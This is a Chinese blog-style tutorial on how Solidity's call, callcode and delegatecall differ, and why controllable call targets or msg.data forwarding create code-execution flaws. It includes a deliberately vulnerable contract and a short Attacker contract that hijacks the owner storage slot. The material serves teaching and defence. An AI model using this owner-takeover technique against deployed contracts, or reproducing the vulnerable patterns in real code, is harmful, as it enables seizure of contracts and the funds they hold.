Solidity 代码执行漏洞原理

目录

1. 三种 call 方式

2. 两种 call 参数类型

3. 漏洞场景

3.1 delegatecall

3.2 call

1. 三种 call 方式

Solidity 中一个合约调用其他合约的函数有三种方式:

<address>.call(...) returns (bool)
<address>.callcode(...) returns (bool)
<address>.delegatecall(...) returns (bool)

1)call()

call 是最常用的调用方式,call 的外部调用上下文是被调用者合约,也就是指执行环境为被调用者的运行环境,调用后内置变量 msg 的值会修改为调用者。

2)delegatecall()

delegatecall 的外部调用上下文是调用者合约,也就是指执行环境为调用者的运行环境,调用后内置变量 msg 的值不会修改为调用者。

3)callcode()

callcode 的外部调用上下文是调用者合约,也就是指执行环境为调用者的运行环境,调用后内置变量 msg 的值会修改为调用者

2. 两种 call 参数类型

传入 call 函数的参数有两种类型:

1)函数签名

函数签名 = 函数名 + (参数类型列表),uint 和 int 要写为 uint256 和 int256

func(uint arg1, int arg2)  ==>  func(uint256,int256)

 调用方式:

<addr>.call(bytes)
addr.call(abi.encodeWithSignature("func(uint256)", arg1));
addr.call(msg.data);

msg.data

msg.data 是 solidity 中的一个全局变量,值为完整的 calldata(调用函数时传入的数据),前4个字节就是函数选择器,后面参数的每个值会转换为固定长度为 32bytes 的十六进制字符串。如果有多个参数,则串联在一起。

如图,three_call 的参数值,和 msg.data 的值是一样的

2)函数选择器

函数选择器:函数签名的 Keccak 哈希后的前 4个字节,后边跟参数

<addr>.call(bytes4 selector)
addr.call(bytes4(keccak-256("func(uint)")),arg1);
addr.call(abi.encodeWithSelector(0x6a627842, "0x2c44b726ADF1963cA47Af88B284C06f30380fC78"))

3. 漏洞场景

前置知识:EVM 的 storage

单个合约中状态变量存储在 storage 中,会按声明顺序存入卡槽 slot

contract A{address owner;B addrB;
}

3.1 delegatecall

delegatecall 的变化

当合约 A 和 合约 C 都有状态变量,delegatecall 调用的函数如果修改了合约 C 第一状态变量的值,那么实际修改的是合约 A 中第一个状态变量的值,也就是合约 A 的 slot 0 中的状态变量 owner

漏洞场景:

  • delegatecall 地址可控,可以修改调用者合约状态变量
  • delegatecall 参数可控,可以执行被调用合约的敏感函数,如:使用了 msg.data 作为 delegatecall 参数
pragma solidity ^0.4.23;
// 合约 A
contract A{address owner;B addrB;constructor() {owner = msg.sender; }function changeOwner(address _newOwner) public {require(msg.sender == owner); owner = _newOwner;    }function setB(B addr) public {addrB = addr;}// vuln1:delegatecall 地址可控function vuln1(address _contract) public {_contract.delegatecall(abi.encodeWithSignature("func()"));}// vuln2:delegatecall 参数可控function() public{addrB.delegatecall(msg.data);}
}// 合约 B
contract B {address public owner;function init() public  {owner = msg.sender;}
}

攻击合约

pragma solidity ^0.4.23;
import "./A.sol";contract Attacker{address public owner;// 攻击 vuln1function func() public {// 修改合约 A 状态变量 ownerowner = msg.sender;    }function attack_vuln2(address addrA) public {// 调用合约 A 中不存在的函数 init,进而执行 fallback 函数,// 而此时 msg.data 的前4个字节就是 init 函数选择器,// 进而执行了合约 B 的 init 函数// A(addrA).init();    addrA.call(abi.encodeWithSignature("init()"));}
}

3.2 call

使用 call 调用别的合约的函数时,执行环境是被调用的合约执行环境,改变的也是被调用合约的状态变量。在合约内部实例化别的合约,也是相当于是 call 调用。

call 的漏洞场景和 delegatecall 差不多:

  • call 地址可控:执行任意地址合约的的同名函数
  • call 参数可控:执行该地址的合约的任意函数
    • 调用函数签名可控
    • 调用函数的参数可控

EVM 的一个特性:EVM 在获取参数的时候没有参数个数校验的过程,从前往后取值,取够参数个数后就把后面的多余参数截断了,在编译和运行阶段都不会报错。

如下:后面的参数 4 和 5 会被截断

addr.call(bytes4(keccak256("test(uint256,uint256,uint256)")),1,2,3,4,5)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/222081.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【数据结构入门精讲 | 第一篇】打开数据结构之门

【数据结构入门精讲 | 第一篇】打开数据结构之门

数据结构与算法是计算机科学中的核心概念&#xff0c;也与现实生活如算法岗息息相关。鉴于全网数据结构文章良莠不齐且集成度不高&#xff0c;故开设本专栏&#xff0c;为初学者提供指引。 目录 基本概念数据结构为何面世算法基本数据类型抽象数据类型使用抽象数据类型的好处 数…
阅读更多...
LeetCode2697. Lexicographically Smallest Palindrome

LeetCode2697. Lexicographically Smallest Palindrome

文章目录 一、题目二、题解 一、题目 You are given a string s consisting of lowercase English letters, and you are allowed to perform operations on it. In one operation, you can replace a character in s with another lowercase English letter. Your task is t…
阅读更多...
WebSocket 协议的原理和实践

WebSocket 协议的原理和实践

WebSocket 是一种基于 TCP 的双向通信协议&#xff0c;它可以在客户端和服务器之间建立一个持久连接&#xff0c;并且可以在连接生命周期内进行数据的传输。WebSocket 协议的目的是为了解决 HTTP 协议的一些局限性&#xff0c;比如&#xff1a; HTTP 协议是单向的&#xff1a;…
阅读更多...
自己动手写数据库: select 查询语句对应查询树的构造和执行

自己动手写数据库: select 查询语句对应查询树的构造和执行

首先我们需要给原来代码打个补丁&#xff0c;在SelectScan 结构体初始化时需要传入 UpdateScan 接口对象&#xff0c;但很多时候我们需要传入的是 Scan 对象&#xff0c;因此我们需要做一个转换&#xff0c;也就是当初始化 SelectScan 时&#xff0c;如果传入的是 Scan 对象&am…
阅读更多...
VUE笔试题精讲1

VUE笔试题精讲1

vue专题| ProcessOn免费在线作图,在线流程图,在线思维导图 VUE面试题视频 01-Vue组件之间通信方式有哪些? 1. 组件通信常⽤⽅式有以下8种: props $emit/$on $children/$parent $attrs/$listeners ref $root eventbus vuex 注意vue3中废弃的⼏个API https://v3-mig…
阅读更多...
Python学习之——装饰器

Python学习之——装饰器

Python学习之——装饰器 参考基础闭包概念装饰器系统自带的装饰器propertystaticmethodclassmethod 自定义装饰器函数的装饰器无参数有参数 类的装饰器无参数有参数 functools.wraps装饰器类 装饰器实现单例模式 参考 python装饰器的4种类型&#xff1a;函数装饰函数、函数装饰…
阅读更多...
全志V3s之U-Boot

全志V3s之U-Boot

1、安装交叉编译器&#xff1a; ARM交叉编译器的官网&#xff1a;交叉编译器 a、使用wget下载&#xff1a; wget https://releases.linaro.org/components/toolchain/binaries/latest/arm-linux-gnueabihf/gcc-linaro-6.3.1-2017.05-x86_64_arm-linux-gnueabihf.tar.xzb、解…
阅读更多...
【运动控制】移动机器人的移动效率/运动效率包括的性能

【运动控制】移动机器人的移动效率/运动效率包括的性能

速度 (Speed): 机器人在单位时间内的位移。 灵活性 (Agility): 机器人在不同方向上的灵活程度。 稳定性 (Stability): 机器人运动过程中的平稳性和不摇晃的程度。 准确性 (Accuracy): 机器人达到目标位置的精确程度。 能耗 (Energy Efficiency): 机器人完成任务所消耗的能源…
阅读更多...
mmseg上手自己的数据集

mmseg上手自己的数据集

制作自己的数据集&#xff0c;VOC格式为例。 这三个文件包括数据集的名称。可以使用labelme脚本自动生成。 跟据预测类别修改配置文件 D:\projects\mmsegmentation-main\mmseg\datasets\voc.py 因为是voc格式的数据集&#xff0c;在这个文件里进行配置&#xff0c;修改成自己数…
阅读更多...
每日分享,以元旦为题的诗词

每日分享,以元旦为题的诗词

元旦佳节即将来临&#xff0c;相信大家都会在朋友圈表达一下自己的情感&#xff0c;不管大家以前是怎么表达的&#xff0c;今天小编给你分享几首以元旦为题的几首诗&#xff0c;喜欢的朋友可以自取&#xff0c;想要更多免费的诗词&#xff0c;请自行百度或小程序搜索&#xff1…
阅读更多...
异构集成的高速总线核算实例

异构集成的高速总线核算实例

带宽增长的问题 Shannon-Hartley定理给出了一个无线信道能够传输的信息总量 C BW log2&#xff08;1SNR&#xff09; 其中C为信道容量&#xff0c;BW为信号带宽&#xff0c;SNR为信道的信噪比&#xff0c;信息容量直接与信道带宽成正比。而信道带宽则直接由采样速率所确定。…
阅读更多...
SLAM算法与工程实践——相机篇:传统相机使用(2)

SLAM算法与工程实践——相机篇:传统相机使用(2)

SLAM算法与工程实践系列文章 下面是SLAM算法与工程实践系列文章的总链接&#xff0c;本人发表这个系列的文章链接均收录于此 SLAM算法与工程实践系列文章链接 下面是专栏地址&#xff1a; SLAM算法与工程实践系列专栏 文章目录 SLAM算法与工程实践系列文章SLAM算法与工程实践…
阅读更多...
C++共享和保护——(3)静态成员

C++共享和保护——(3)静态成员

归纳编程学习的感悟&#xff0c; 记录奋斗路上的点滴&#xff0c; 希望能帮到一样刻苦的你&#xff01; 如有不足欢迎指正&#xff01; 共同学习交流&#xff01; &#x1f30e;欢迎各位→点赞 &#x1f44d; 收藏⭐ 留言​&#x1f4dd; 信念&#xff0c;你拿它没办法&#x…
阅读更多...
【算法集训】基础数据结构:七、树

【算法集训】基础数据结构:七、树

第一题 2236. 判断根结点是否等于子结点之和 这一题很简单&#xff0c;只有三个节点&#xff0c;判断就可以了 /*** Definition for a binary tree node.* struct TreeNode {* int val;* struct TreeNode *left;* struct TreeNode *right;* };*/bool checkTree(s…
阅读更多...
Java 第8章 本章作业

Java 第8章 本章作业

目录 4.通过继承实现员工工资核算打印功能 6.父类和子类中通过this和super都可以调用哪些属性和方法 8.扩展如下的BankAccount类 10.判断测试类中创建的两个对象是否相等 11.向上转型&向下转型 12.equals和的区别 15.什么是多态,多态具体体现有哪些? 16. java的动…
阅读更多...
Spring Bean基础

Spring Bean基础

写在最前面: 本文运行的示例在我github项目中的spring-bean模块&#xff0c;源码位置: spring-bean 前言 为什么要先掌握 Spring Bean 的基础知识&#xff1f; 我们知道 Spring 框架提供的一个最重要也是最核心的能力就是管理 Bean 实例。以下是其原因&#xff1a; 核心组件…
阅读更多...
Python实现图像批量png格式转为npy格式

Python实现图像批量png格式转为npy格式

前言 在进行深度学习处理时&#xff0c;有些的代码处理的数据格式为npy&#xff0c;但是常常有的数据格式为png&#xff0c;因此下面就用Python实现图像批量png格式转为npy格式&#xff0c;代码进行了详细注释。 1 png2npy # -- coding: UTF-8 --Author: Clouds rising Date…
阅读更多...
新版Spring Security6.2案例 - Authentication用户名密码

新版Spring Security6.2案例 - Authentication用户名密码

前言&#xff1a; 前面有翻译了新版Spring Security6.2架构&#xff0c;包括总体架构&#xff0c;Authentication和Authorization&#xff0c;感兴趣可以直接点链接&#xff0c;这篇翻译官网给出的关于Authentication的Username/Password这页。 首先呢&#xff0c;官网就直接…
阅读更多...
前端如何使用express写一个简单的服务

前端如何使用express写一个简单的服务

相信不少前端平常在日常工作中肯遇见过后端API接口没开发出来的时候吧 前端提升小技巧 自己使用nodejs——express ,koa&#xff0c;egg开发接口吧(本人比较喜欢egg和express) 今天先分享一下express 下面是一个简单的demo 1、首先咱们可以新建一个文件夹,创建一个app.js 下…
阅读更多...
【开源软件】最好的开源软件-2023-第18名 OpenTelemetry

【开源软件】最好的开源软件-2023-第18名 OpenTelemetry

自我介绍 做一个简单介绍&#xff0c;酒架年近48 &#xff0c;有20多年IT工作经历&#xff0c;目前在一家500强做企业架构&#xff0e;因为工作需要&#xff0c;另外也因为兴趣涉猎比较广&#xff0c;为了自己学习建立了三个博客&#xff0c;分别是【全球IT瞭望】&#xff0c;【…
阅读更多...
最新文章

Copyright @ 2022~2023